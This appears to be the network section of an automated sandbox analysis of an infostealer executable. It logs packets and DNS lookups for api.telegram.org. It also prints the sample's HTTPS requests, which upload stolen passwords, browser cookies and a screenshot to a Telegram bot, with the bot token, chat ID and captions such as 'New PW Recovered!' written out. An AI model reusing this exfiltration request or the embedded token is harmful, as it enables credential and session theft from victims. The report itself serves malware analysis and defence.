                                                May 18, 2024 01:38:50.524779081 CEST49747443192.168.2.4149.154.167.220
                                                May 18, 2024 01:38:56.956126928 CEST49748443192.168.2.4149.154.167.220
                                                May 18, 2024 01:38:56.956176043 CEST44349748149.154.167.220192.168.2.4
                                                May 18, 2024 01:38:56.956365108 CEST49748443192.168.2.4149.154.167.220
                                                May 18, 2024 01:38:56.959417105 CEST49748443192.168.2.4149.154.167.220
                                                May 18, 2024 01:38:56.959434032 CEST44349748149.154.167.220192.168.2.4
                                                May 18, 2024 01:38:58.066082954 CEST44349748149.154.167.220192.168.2.4
                                                May 18, 2024 01:38:58.066143036 CEST49748443192.168.2.4149.154.167.220
                                                May 18, 2024 01:38:58.068530083 CEST49748443192.168.2.4149.154.167.220
                                                May 18, 2024 01:38:58.068540096 CEST44349748149.154.167.220192.168.2.4
                                                May 18, 2024 01:38:58.068789959 CEST44349748149.154.167.220192.168.2.4
                                                May 18, 2024 01:38:58.070900917 CEST49748443192.168.2.4149.154.167.220
                                                May 18, 2024 01:38:58.116128922 CEST44349748149.154.167.220192.168.2.4
                                                May 18, 2024 01:38:58.425928116 CEST49748443192.168.2.4149.154.167.220
                                                May 18, 2024 01:38:58.425956011 CEST44349748149.154.167.220192.168.2.4
                                                May 18, 2024 01:38:58.426037073 CEST49748443192.168.2.4149.154.167.220
                                                May 18, 2024 01:38:58.426044941 CEST44349748149.154.167.220192.168.2.4
                                                May 18, 2024 01:38:58.426125050 CEST49748443192.168.2.4149.154.167.220
                                                May 18, 2024 01:38:58.426140070 CEST44349748149.154.167.220192.168.2.4
                                                May 18, 2024 01:38:58.936476946 CEST44349748149.154.167.220192.168.2.4
                                                May 18, 2024 01:38:58.989415884 CEST49748443192.168.2.4149.154.167.220
                                                May 18, 2024 01:38:59.245271921 CEST44349748149.154.167.220192.168.2.4
                                                May 18, 2024 01:38:59.248157978 CEST49748443192.168.2.4149.154.167.220
                                                May 18, 2024 01:38:59.248215914 CEST44349748149.154.167.220192.168.2.4
                                                May 18, 2024 01:38:59.248452902 CEST44349748149.154.167.220192.168.2.4
                                                May 18, 2024 01:38:59.248693943 CEST49748443192.168.2.4149.154.167.220
                                                May 18, 2024 01:38:59.248693943 CEST49748443192.168.2.4149.154.167.220
                                                May 18, 2024 01:39:03.393627882 CEST49749443192.168.2.4149.154.167.220
                                                May 18, 2024 01:39:03.393665075 CEST44349749149.154.167.220192.168.2.4
                                                May 18, 2024 01:39:03.393989086 CEST49749443192.168.2.4149.154.167.220
                                                May 18, 2024 01:39:03.394212961 CEST49749443192.168.2.4149.154.167.220
                                                May 18, 2024 01:39:03.394222975 CEST44349749149.154.167.220192.168.2.4
                                                May 18, 2024 01:39:04.293181896 CEST49750443192.168.2.4149.154.167.220
                                                May 18, 2024 01:39:04.293236017 CEST44349750149.154.167.220192.168.2.4
                                                May 18, 2024 01:39:04.293292046 CEST49750443192.168.2.4149.154.167.220
                                                May 18, 2024 01:39:04.295393944 CEST49750443192.168.2.4149.154.167.220
                                                May 18, 2024 01:39:04.295411110 CEST44349750149.154.167.220192.168.2.4
                                                May 18, 2024 01:39:04.301446915 CEST49749443192.168.2.4149.154.167.220
                                                May 18, 2024 01:39:04.348120928 CEST44349749149.154.167.220192.168.2.4
                                                May 18, 2024 01:39:04.532150984 CEST44349749149.154.167.220192.168.2.4
                                                May 18, 2024 01:39:04.532207012 CEST49749443192.168.2.4149.154.167.220
                                                May 18, 2024 01:39:04.532218933 CEST49749443192.168.2.4149.154.167.220
                                                May 18, 2024 01:39:05.516967058 CEST44349750149.154.167.220192.168.2.4
                                                May 18, 2024 01:39:05.517059088 CEST49750443192.168.2.4149.154.167.220
                                                May 18, 2024 01:39:05.518656969 CEST49750443192.168.2.4149.154.167.220
                                                May 18, 2024 01:39:05.518667936 CEST44349750149.154.167.220192.168.2.4
                                                May 18, 2024 01:39:05.518867970 CEST44349750149.154.167.220192.168.2.4
                                                May 18, 2024 01:39:05.520809889 CEST49750443192.168.2.4149.154.167.220
                                                May 18, 2024 01:39:05.568110943 CEST44349750149.154.167.220192.168.2.4
                                                May 18, 2024 01:39:05.878987074 CEST49750443192.168.2.4149.154.167.220
                                                May 18, 2024 01:39:05.879020929 CEST44349750149.154.167.220192.168.2.4
                                                May 18, 2024 01:39:05.879091978 CEST49750443192.168.2.4149.154.167.220
                                                May 18, 2024 01:39:05.879106045 CEST44349750149.154.167.220192.168.2.4
                                                May 18, 2024 01:39:05.879179955 CEST49750443192.168.2.4149.154.167.220
                                                May 18, 2024 01:39:05.879273891 CEST44349750149.154.167.220192.168.2.4
                                                May 18, 2024 01:39:06.037580013 CEST44349750149.154.167.220192.168.2.4
                                                May 18, 2024 01:39:06.081942081 CEST49750443192.168.2.4149.154.167.220
                                                May 18, 2024 01:39:06.498903036 CEST44349750149.154.167.220192.168.2.4
                                                May 18, 2024 01:39:06.499470949 CEST49750443192.168.2.4149.154.167.220
                                                May 18, 2024 01:39:06.499521971 CEST44349750149.154.167.220192.168.2.4
                                                May 18, 2024 01:39:06.499588966 CEST49750443192.168.2.4149.154.167.220
                                                May 18, 2024 01:39:22.015482903 CEST49751443192.168.2.4149.154.167.220
                                                May 18, 2024 01:39:22.015512943 CEST44349751149.154.167.220192.168.2.4
                                                May 18, 2024 01:39:22.015706062 CEST49751443192.168.2.4149.154.167.220
                                                May 18, 2024 01:39:22.019402027 CEST49751443192.168.2.4149.154.167.220
                                                May 18, 2024 01:39:22.019417048 CEST44349751149.154.167.220192.168.2.4
                                                May 18, 2024 01:39:23.130584002 CEST44349751149.154.167.220192.168.2.4
                                                May 18, 2024 01:39:23.130657911 CEST49751443192.168.2.4149.154.167.220
                                                May 18, 2024 01:39:23.132775068 CEST49751443192.168.2.4149.154.167.220
                                                May 18, 2024 01:39:23.132785082 CEST44349751149.154.167.220192.168.2.4
                                                May 18, 2024 01:39:23.133117914 CEST44349751149.154.167.220192.168.2.4
                                                May 18, 2024 01:39:23.134525061 CEST49751443192.168.2.4149.154.167.220
                                                May 18, 2024 01:39:23.180104971 CEST44349751149.154.167.220192.168.2.4
                                                May 18, 2024 01:39:23.488487005 CEST49751443192.168.2.4149.154.167.220
                                                May 18, 2024 01:39:23.488534927 CEST44349751149.154.167.220192.168.2.4
                                                May 18, 2024 01:39:23.488703966 CEST49751443192.168.2.4149.154.167.220
                                                May 18, 2024 01:39:23.488725901 CEST44349751149.154.167.220192.168.2.4
                                                May 18, 2024 01:39:23.488795996 CEST49751443192.168.2.4149.154.167.220
                                                May 18, 2024 01:39:23.488889933 CEST44349751149.154.167.220192.168.2.4
                                                May 18, 2024 01:39:23.633981943 CEST44349751149.154.167.220192.168.2.4
                                                May 18, 2024 01:39:23.738217115 CEST49751443192.168.2.4149.154.167.220
                                                May 18, 2024 01:39:24.109774113 CEST44349751149.154.167.220192.168.2.4
                                                May 18, 2024 01:39:24.110265017 CEST49751443192.168.2.4149.154.167.220
                                                May 18, 2024 01:39:24.110327005 CEST44349751149.154.167.220192.168.2.4
                                                May 18, 2024 01:39:24.110637903 CEST44349751149.154.167.220192.168.2.4
                                                May 18, 2024 01:39:24.111953974 CEST49751443192.168.2.4149.154.167.220
                                                May 18, 2024 01:39:24.111953974 CEST49751443192.168.2.4149.154.167.220
                                                May 18, 2024 01:39:27.678694010 CEST49752443192.168.2.4149.154.167.220
                                                May 18, 2024 01:39:27.678778887 CEST44349752149.154.167.220192.168.2.4
                                                May 18, 2024 01:39:27.679018021 CEST49752443192.168.2.4149.154.167.220
                                                May 18, 2024 01:39:27.679343939 CEST49752443192.168.2.4149.154.167.220
                                                May 18, 2024 01:39:27.679416895 CEST44349752149.154.167.220192.168.2.4
                                                May 18, 2024 01:39:28.771625996 CEST44349752149.154.167.220192.168.2.4
                                                May 18, 2024 01:39:28.771852016 CEST49752443192.168.2.4149.154.167.220
                                                May 18, 2024 01:39:28.773766994 CEST49752443192.168.2.4149.154.167.220
                                                May 18, 2024 01:39:28.773821115 CEST44349752149.154.167.220192.168.2.4
                                                May 18, 2024 01:39:28.774174929 CEST44349752149.154.167.220192.168.2.4
                                                May 18, 2024 01:39:28.775948048 CEST49752443192.168.2.4149.154.167.220
                                                May 18, 2024 01:39:28.816200972 CEST44349752149.154.167.220192.168.2.4
                                                May 18, 2024 01:39:29.129134893 CEST49752443192.168.2.4149.154.167.220
                                                May 18, 2024 01:39:29.129220963 CEST44349752149.154.167.220192.168.2.4
                                                May 18, 2024 01:39:29.129431009 CEST49752443192.168.2.4149.154.167.220
                                                May 18, 2024 01:39:29.129462957 CEST44349752149.154.167.220192.168.2.4
                                                May 18, 2024 01:39:29.129863024 CEST49752443192.168.2.4149.154.167.220
                                                May 18, 2024 01:39:29.129982948 CEST44349752149.154.167.220192.168.2.4
                                                May 18, 2024 01:39:29.266002893 CEST49753443192.168.2.4149.154.167.220
                                                May 18, 2024 01:39:29.266006947 CEST49752443192.168.2.4149.154.167.220
                                                May 18, 2024 01:39:29.266084909 CEST44349753149.154.167.220192.168.2.4
                                                May 18, 2024 01:39:29.266279936 CEST44349752149.154.167.220192.168.2.4
                                                May 18, 2024 01:39:29.266346931 CEST49753443192.168.2.4149.154.167.220
                                                May 18, 2024 01:39:29.266525030 CEST49753443192.168.2.4149.154.167.220
                                                May 18, 2024 01:39:29.266556978 CEST49752443192.168.2.4149.154.167.220
                                                May 18, 2024 01:39:29.266585112 CEST44349753149.154.167.220192.168.2.4
                                                May 18, 2024 01:39:29.566423893 CEST49754443192.168.2.4149.154.167.220
                                                May 18, 2024 01:39:29.566507101 CEST44349754149.154.167.220192.168.2.4
                                                May 18, 2024 01:39:29.566641092 CEST49754443192.168.2.4149.154.167.220
                                                May 18, 2024 01:39:29.566956997 CEST49754443192.168.2.4149.154.167.220
                                                May 18, 2024 01:39:29.566981077 CEST44349754149.154.167.220192.168.2.4
                                                May 18, 2024 01:39:30.410002947 CEST44349753149.154.167.220192.168.2.4
                                                May 18, 2024 01:39:30.410187960 CEST49753443192.168.2.4149.154.167.220
                                                May 18, 2024 01:39:30.411886930 CEST49753443192.168.2.4149.154.167.220
                                                May 18, 2024 01:39:30.411938906 CEST44349753149.154.167.220192.168.2.4
                                                May 18, 2024 01:39:30.412192106 CEST44349753149.154.167.220192.168.2.4
                                                May 18, 2024 01:39:30.413441896 CEST49753443192.168.2.4149.154.167.220
                                                May 18, 2024 01:39:30.460108042 CEST44349753149.154.167.220192.168.2.4
                                                May 18, 2024 01:39:30.640496969 CEST44349754149.154.167.220192.168.2.4
                                                May 18, 2024 01:39:30.640568972 CEST49754443192.168.2.4149.154.167.220
                                                May 18, 2024 01:39:30.642040014 CEST49754443192.168.2.4149.154.167.220
                                                May 18, 2024 01:39:30.642052889 CEST44349754149.154.167.220192.168.2.4
                                                May 18, 2024 01:39:30.642504930 CEST44349754149.154.167.220192.168.2.4
                                                May 18, 2024 01:39:30.643656969 CEST49754443192.168.2.4149.154.167.220
                                                May 18, 2024 01:39:30.688116074 CEST44349754149.154.167.220192.168.2.4
                                                May 18, 2024 01:39:30.769951105 CEST49753443192.168.2.4149.154.167.220
                                                May 18, 2024 01:39:30.770036936 CEST44349753149.154.167.220192.168.2.4
                                                May 18, 2024 01:39:30.770654917 CEST49753443192.168.2.4149.154.167.220
                                                May 18, 2024 01:39:30.770750999 CEST44349753149.154.167.220192.168.2.4
                                                May 18, 2024 01:39:30.770981073 CEST49753443192.168.2.4149.154.167.220
                                                May 18, 2024 01:39:30.771020889 CEST44349753149.154.167.220192.168.2.4
                                                May 18, 2024 01:39:30.930491924 CEST44349753149.154.167.220192.168.2.4
                                                May 18, 2024 01:39:30.988389015 CEST49754443192.168.2.4149.154.167.220
                                                May 18, 2024 01:39:30.988481998 CEST44349754149.154.167.220192.168.2.4
                                                May 18, 2024 01:39:30.988938093 CEST49754443192.168.2.4149.154.167.220
                                                May 18, 2024 01:39:30.988962889 CEST44349754149.154.167.220192.168.2.4
                                                May 18, 2024 01:39:30.989314079 CEST49754443192.168.2.4149.154.167.220
                                                May 18, 2024 01:39:30.989476919 CEST44349754149.154.167.220192.168.2.4
                                                May 18, 2024 01:39:31.128941059 CEST49753443192.168.2.4149.154.167.220
                                                May 18, 2024 01:39:31.179101944 CEST44349754149.154.167.220192.168.2.4
                                                May 18, 2024 01:39:31.238207102 CEST49754443192.168.2.4149.154.167.220
                                                May 18, 2024 01:39:31.398756027 CEST44349753149.154.167.220192.168.2.4
                                                May 18, 2024 01:39:31.401936054 CEST49753443192.168.2.4149.154.167.220
                                                May 18, 2024 01:39:31.402014017 CEST44349753149.154.167.220192.168.2.4
                                                May 18, 2024 01:39:31.402122021 CEST49753443192.168.2.4149.154.167.220
                                                May 18, 2024 01:39:31.603620052 CEST44349754149.154.167.220192.168.2.4
                                                May 18, 2024 01:39:31.604223967 CEST49754443192.168.2.4149.154.167.220
                                                May 18, 2024 01:39:31.604273081 CEST44349754149.154.167.220192.168.2.4
                                                May 18, 2024 01:39:31.604461908 CEST44349754149.154.167.220192.168.2.4
                                                May 18, 2024 01:39:31.604530096 CEST49754443192.168.2.4149.154.167.220
                                                May 18, 2024 01:39:31.604530096 CEST49754443192.168.2.4149.154.167.220
                                                May 18, 2024 01:39:40.045926094 CEST49755443192.168.2.4149.154.167.220
                                                May 18, 2024 01:39:40.045968056 CEST44349755149.154.167.220192.168.2.4
                                                May 18, 2024 01:39:40.046037912 CEST49755443192.168.2.4149.154.167.220
                                                May 18, 2024 01:39:40.046339035 CEST49755443192.168.2.4149.154.167.220
                                                May 18, 2024 01:39:40.046355963 CEST44349755149.154.167.220192.168.2.4
                                                May 18, 2024 01:39:41.170532942 CEST44349755149.154.167.220192.168.2.4
                                                May 18, 2024 01:39:41.170945883 CEST49755443192.168.2.4149.154.167.220
                                                May 18, 2024 01:39:41.173388004 CEST49755443192.168.2.4149.154.167.220
                                                May 18, 2024 01:39:41.173398972 CEST44349755149.154.167.220192.168.2.4
                                                May 18, 2024 01:39:41.173803091 CEST44349755149.154.167.220192.168.2.4
                                                May 18, 2024 01:39:41.175162077 CEST49755443192.168.2.4149.154.167.220
                                                May 18, 2024 01:39:41.216190100 CEST44349755149.154.167.220192.168.2.4
                                                May 18, 2024 01:39:41.519629002 CEST49755443192.168.2.4149.154.167.220
                                                May 18, 2024 01:39:41.519676924 CEST44349755149.154.167.220192.168.2.4
                                                May 18, 2024 01:39:41.519821882 CEST49755443192.168.2.4149.154.167.220
                                                May 18, 2024 01:39:41.519867897 CEST44349755149.154.167.220192.168.2.4
                                                May 18, 2024 01:39:41.520699978 CEST49755443192.168.2.4149.154.167.220
                                                May 18, 2024 01:39:41.520761013 CEST44349755149.154.167.220192.168.2.4
                                                May 18, 2024 01:39:41.685163975 CEST44349755149.154.167.220192.168.2.4
                                                May 18, 2024 01:39:41.740149021 CEST49755443192.168.2.4149.154.167.220
                                                May 18, 2024 01:39:42.147763968 CEST44349755149.154.167.220192.168.2.4
                                                May 18, 2024 01:39:42.148614883 CEST49755443192.168.2.4149.154.167.220
                                                May 18, 2024 01:39:42.148736954 CEST44349755149.154.167.220192.168.2.4
                                                May 18, 2024 01:39:42.148789883 CEST49755443192.168.2.4149.154.167.220
                                                May 18, 2024 01:40:00.764022112 CEST49756443192.168.2.4149.154.167.220
                                                May 18, 2024 01:40:00.764117956 CEST44349756149.154.167.220192.168.2.4
                                                May 18, 2024 01:40:00.764214993 CEST49756443192.168.2.4149.154.167.220
                                                May 18, 2024 01:40:00.764417887 CEST49756443192.168.2.4149.154.167.220
                                                May 18, 2024 01:40:00.764441013 CEST44349756149.154.167.220192.168.2.4
                                                May 18, 2024 01:40:01.973586082 CEST44349756149.154.167.220192.168.2.4
                                                May 18, 2024 01:40:01.973663092 CEST49756443192.168.2.4149.154.167.220
                                                May 18, 2024 01:40:01.975150108 CEST49756443192.168.2.4149.154.167.220
                                                May 18, 2024 01:40:01.975158930 CEST44349756149.154.167.220192.168.2.4
                                                May 18, 2024 01:40:01.975649118 CEST44349756149.154.167.220192.168.2.4
                                                May 18, 2024 01:40:01.976957083 CEST49756443192.168.2.4149.154.167.220
                                                May 18, 2024 01:40:02.024113894 CEST44349756149.154.167.220192.168.2.4
                                                May 18, 2024 01:40:02.332149029 CEST49756443192.168.2.4149.154.167.220
                                                May 18, 2024 01:40:02.332182884 CEST44349756149.154.167.220192.168.2.4
                                                May 18, 2024 01:40:02.332269907 CEST49756443192.168.2.4149.154.167.220
                                                May 18, 2024 01:40:02.332281113 CEST44349756149.154.167.220192.168.2.4
                                                May 18, 2024 01:40:02.332365036 CEST49756443192.168.2.4149.154.167.220
                                                May 18, 2024 01:40:02.332498074 CEST44349756149.154.167.220192.168.2.4
                                                May 18, 2024 01:40:02.492197037 CEST44349756149.154.167.220192.168.2.4
                                                May 18, 2024 01:40:02.535063028 CEST49756443192.168.2.4149.154.167.220
                                                May 18, 2024 01:40:02.947458982 CEST44349756149.154.167.220192.168.2.4
                                                May 18, 2024 01:40:02.948128939 CEST49756443192.168.2.4149.154.167.220
                                                May 18, 2024 01:40:02.948227882 CEST44349756149.154.167.220192.168.2.4
                                                May 18, 2024 01:40:02.948700905 CEST44349756149.154.167.220192.168.2.4
                                                May 18, 2024 01:40:02.952178955 CEST49756443192.168.2.4149.154.167.220
                                                May 18, 2024 01:40:02.952178955 CEST49756443192.168.2.4149.154.167.220

                                                UDP Packets

                                                TimestampSource PortDest PortSource IPDest IP
                                                May 18, 2024 01:35:56.250650883 CEST5604253192.168.2.41.1.1.1
                                                May 18, 2024 01:35:56.261547089 CEST53560421.1.1.1192.168.2.4
                                                May 18, 2024 01:38:36.064038038 CEST5196353192.168.2.41.1.1.1
                                                May 18, 2024 01:38:36.070816040 CEST53519631.1.1.1192.168.2.4

                                                DNS Queries

                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                May 18, 2024 01:35:56.250650883 CEST192.168.2.41.1.1.10x25a4Standard query (0)api.telegram.orgA (IP address)IN (0x0001)false
                                                May 18, 2024 01:38:36.064038038 CEST192.168.2.41.1.1.10x3b37Standard query (0)api.telegram.orgA (IP address)IN (0x0001)false

                                                DNS Answers

                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                May 18, 2024 01:35:56.261547089 CEST1.1.1.1192.168.2.40x25a4No error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false
                                                May 18, 2024 01:38:36.070816040 CEST1.1.1.1192.168.2.40x3b37No error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false

                                                HTTP Request Dependency Graph

                                                • api.telegram.org

                                                HTTPS Proxied Packets

                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                0192.168.2.449730149.154.167.2204436768C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exe
                                                TimestampBytes transferredDirectionData
                                                2024-05-17 23:35:57 UTC260OUTPOST /bot6937426667:AAH5h4aXvUjmlMFV8im9A9lKn7JS7MyNHLA/sendDocument HTTP/1.1
                                                Content-Type: multipart/form-data; boundary=---------------------------8dc76a891c5b1d3
                                                Host: api.telegram.org
                                                Content-Length: 915
                                                Expect: 100-continue
                                                Connection: Keep-Alive
                                                2024-05-17 23:35:57 UTC915OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 37 36 61 38 39 31 63 35 62 31 64 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 31 31 36 35 31 32 38 34 38 32 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 37 36 61 38 39 31 63 35 62 31 64 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 50 57 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 54 69 6d 65 3a 20 30 35 2f 31 37 2f 32 30 32 34 20 31 39 3a 33 35 3a 35 35 0a 55 73 65 72
                                                Data Ascii: -----------------------------8dc76a891c5b1d3Content-Disposition: form-data; name="chat_id"1165128482-----------------------------8dc76a891c5b1d3Content-Disposition: form-data; name="caption"New PW Recovered!Time: 05/17/2024 19:35:55User
                                                2024-05-17 23:35:57 UTC25INHTTP/1.1 100 Continue
                                                2024-05-17 23:35:58 UTC402INHTTP/1.1 400 Bad Request
                                                Server: nginx/1.18.0
                                                Date: Fri, 17 May 2024 23:35:58 GMT
                                                Content-Type: application/json
                                                Content-Length: 56
                                                Connection: close
                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                Access-Control-Allow-Origin: *
                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                {"ok":false,"error_code":400,"description":"Logged out"}


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                1192.168.2.449731149.154.167.2204436768C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exe
                                                TimestampBytes transferredDirectionData
                                                2024-05-17 23:35:59 UTC237OUTPOST /bot6937426667:AAH5h4aXvUjmlMFV8im9A9lKn7JS7MyNHLA/sendDocument HTTP/1.1
                                                Content-Type: multipart/form-data; boundary=---------------------------8dc76a893006882
                                                Host: api.telegram.org
                                                Content-Length: 3951
                                                Expect: 100-continue
                                                2024-05-17 23:35:59 UTC1024OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 37 36 61 38 39 33 30 30 36 38 38 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 31 31 36 35 31 32 38 34 38 32 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 37 36 61 38 39 33 30 30 36 38 38 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 43 4f 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 54 69 6d 65 3a 20 30 35 2f 31 37 2f 32 30 32 34 20 31 39 3a 33 35 3a 35 37 0a 55 73 65 72
                                                Data Ascii: -----------------------------8dc76a893006882Content-Disposition: form-data; name="chat_id"1165128482-----------------------------8dc76a893006882Content-Disposition: form-data; name="caption"New CO Recovered!Time: 05/17/2024 19:35:57User
                                                2024-05-17 23:35:59 UTC2877OUTData Raw: 6f 69 64 63 09 46 41 4c 53 45 09 31 33 33 34 30 38 38 37 37 33 35 33 35 39 33 33 34 09 2e 41 73 70 4e 65 74 43 6f 72 65 2e 4f 70 65 6e 49 64 43 6f 6e 6e 65 63 74 2e 4e 6f 6e 63 65 2e 43 66 44 4a 38 4b 69 75 79 5f 42 35 4a 67 46 4d 6f 37 50 65 50 39 35 4e 4c 68 71 77 63 4a 38 6b 6f 44 79 35 70 58 6b 66 6f 57 73 62 35 53 62 62 55 32 68 56 43 62 73 48 32 71 74 39 47 46 5f 4f 56 43 71 46 6b 4c 45 77 68 76 7a 65 41 44 4e 51 4f 46 35 52 53 6d 6b 44 66 68 35 52 71 66 71 6c 4f 6b 78 35 51 57 6f 34 4c 6c 74 76 77 62 30 43 76 77 42 46 44 38 75 6a 6c 6d 33 42 41 67 6c 4f 65 47 63 61 33 5a 61 74 6b 4c 4d 55 6b 48 42 36 61 6c 61 68 55 72 38 71 4a 37 47 5f 33 41 65 6a 74 6f 6f 79 6d 54 57 43 7a 79 4f 38 39 68 73 68 4a 65 58 38 47 68 37 38 6b 6f 68 62 49 77 30 49 51 59
                                                Data Ascii: oidcFALSE13340887735359334.AspNetCore.OpenIdConnect.Nonce.CfDJ8Kiuy_B5JgFMo7PeP95NLhqwcJ8koDy5pXkfoWsb5SbbU2hVCbsH2qt9GF_OVCqFkLEwhvzeADNQOF5RSmkDfh5RqfqlOkx5QWo4Lltvwb0CvwBFD8ujlm3BAglOeGca3ZatkLMUkHB6alahUr8qJ7G_3AejtooymTWCzyO89hshJeX8Gh78kohbIw0IQY
                                                2024-05-17 23:35:59 UTC50OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 37 36 61 38 39 33 30 30 36 38 38 32 2d 2d 0d 0a
                                                Data Ascii: -----------------------------8dc76a893006882--
                                                2024-05-17 23:35:59 UTC25INHTTP/1.1 100 Continue
                                                2024-05-17 23:36:00 UTC402INHTTP/1.1 400 Bad Request
                                                Server: nginx/1.18.0
                                                Date: Fri, 17 May 2024 23:35:59 GMT
                                                Content-Type: application/json
                                                Content-Length: 56
                                                Connection: close
                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                Access-Control-Allow-Origin: *
                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                {"ok":false,"error_code":400,"description":"Logged out"}


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                2192.168.2.449739149.154.167.2204436768C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exe
                                                TimestampBytes transferredDirectionData
                                                2024-05-17 23:37:43 UTC262OUTPOST /bot6937426667:AAH5h4aXvUjmlMFV8im9A9lKn7JS7MyNHLA/sendDocument HTTP/1.1
                                                Content-Type: multipart/form-data; boundary=---------------------------8dc8907cde902bb
                                                Host: api.telegram.org
                                                Content-Length: 66993
                                                Expect: 100-continue
                                                Connection: Keep-Alive
                                                2024-05-17 23:37:43 UTC1024OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 38 39 30 37 63 64 65 39 30 32 62 62 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 31 31 36 35 31 32 38 34 38 32 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 38 39 30 37 63 64 65 39 30 32 62 62 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 53 43 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 54 69 6d 65 3a 20 30 36 2f 31 30 2f 32 30 32 34 20 30 34 3a 34 32 3a 35 36 0a 55 73 65 72
                                                Data Ascii: -----------------------------8dc8907cde902bbContent-Disposition: form-data; name="chat_id"1165128482-----------------------------8dc8907cde902bbContent-Disposition: form-data; name="caption"New SC Recovered!Time: 06/10/2024 04:42:56User
                                                2024-05-17 23:37:43 UTC16355OUTData Raw: f0 15 62 72 d1 0a 16 24 34 e1 25 f1 17 18 19 1a 26 27 28 29 2a 35 36 37 38 39 3a 43 44 45 46 47 48 49 4a 53 54 55 56 57 58 59 5a 63 64 65 66 67 68 69 6a 73 74 75 76 77 78 79 7a 82 83 84 85 86 87 88 89 8a 92 93 94 95 96 97 98 99 9a a2 a3 a4 a5 a6 a7 a8 a9 aa b2 b3 b4 b5 b6 b7 b8 b9 ba c2 c3 c4 c5 c6 c7 c8 c9 ca d2 d3 d4 d5 d6 d7 d8 d9 da e2 e3 e4 e5 e6 e7 e8 e9 ea f2 f3 f4 f5 f6 f7 f8 f9 fa ff da 00 0c 03 01 00 02 11 03 11 00 3f 00 8e 8a 28 af a7 3e 38 28 a9 e2 b4 9a 44 12 60 2c 67 a3 31 c0 3f d4 d4 cb 6b 0a fd e6 69 0f b7 03 ff 00 af fa 56 52 ab 08 ee cd 61 46 72 d9 14 68 ad 55 b5 b6 91 39 8b 6f ba b1 cf eb 9a 86 4d 34 f5 86 55 6f 66 f9 4f f8 52 8d 78 3f 22 a5 87 9c 7c ca 14 54 b3 5b cd 07 fa d8 d9 41 e8 48 e0 fd 0d 45 5b 26 9e c6 2d 35 a3 0a 4a 5a 28 10
                                                Data Ascii: br$4%&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz?(>8(D`,g1?kiVRaFrhU9oM4UofORx?"|T[AHE[&-5JZ(
